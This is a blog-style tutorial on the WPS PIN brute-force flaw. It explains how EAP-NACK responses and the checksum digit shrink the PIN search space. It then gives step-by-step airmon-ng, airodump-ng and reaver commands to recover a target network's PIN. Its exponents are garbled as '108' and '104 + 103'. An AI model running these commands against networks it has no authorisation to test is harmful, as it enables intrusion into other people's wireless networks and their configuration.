WPS or WiFi protected setup is used to automatically configure a wireless network with a Service set identifier (SSID), encryption and authentication. It is designed to setup a wireless network in an environment with ease.

WPS can be enabled with two options

  • PIN
  • Push Button connect (PBC)
  1. PIN : An eight digit pin needs to be entered in connecting device, Also called "external registrar" method
  2. PBC : A physical or virtual button needs to be pushed in router manually in order to authenticate

 

WHY IS WPS USED

  • WPS automatically configures the SSID and required security settings on a network.
  • We do not need to know the security key in order to connect.

 

ATTACK BACKGROUND

When the PIN authentication fails the access point will send an EAP-NACK message back to the client. The EAP-NACK messages are sent in a way that an attacker is able to determine if the first half of the PIN is correct. Also, the last digit of the PIN is known because it is a checksum for the PIN. This design greatly reduces the number of attempts needed to brute force the PIN. The number of attempts goes from 108 to 104 + 103 which is 11,000 attempts in total.

 

IMPACT

An attacker within range of the wireless access point may be able to brute force the WPS PIN and retrieve the password for the wireless network, change the configuration of the access point, or cause a denial of service.

 

EXPLOITATION

For this demo I will use two tools airodump-ng and reaver

  • airodump  is used to scan for available wifi networks, with other info
  • Reaver  on the other hand is used to perform the bruteforce attack.

 

  • Start promiscous mode for your Wifi Adapter by either set of commands
  1. sudo airmon-ng start <interface name>

 

  1. sudo ifconfig  <interface name> down
  2. sudo iwconfig  <interface name> mode monitor
  3. sudo ifconfig  <interface name> up

 

  1. sudo ip link set <interface name> down
  2. sudo iw <interface name> set monitor none
  3. sudo ip link set <interface name> up

 

To get your Wireless Interface name you can type "iwconfig"

> iwconfig
wlp6s0b1  IEEE 802.11  ESSID:"SecurityOwls"  
          Mode:Managed  Frequency:2.462 GHz  Access Point: xx:xx:xx:xx:xx:xx  
          Bit Rate=57.8 Mb/s   Tx-Power=30 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:off
          Link Quality=46/70  Signal level=-64 dBm  
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:341  Invalid misc:449   Missed beacon:0

enp7s0    no wireless extensions.

lo        no wireless extensions.

 

Here you can see my Wireless interface is called wlp6s0b1.  Yours might be different.

So I will type airmon-ng start wlp6s0b1

 

  • Start scan for WPS enabled networks using airodump-ng
# airodump-ng --wps -i wlp6s0b1mon

 

The WPS column states whether WPS is enabled or not. Select the  BSSID of your target network and feed it to reaver :

 

reaver -i wlp6s0b1mon -b BSSID -vv

 

If everything goes fine you will be displayed the WPS pin of your target network.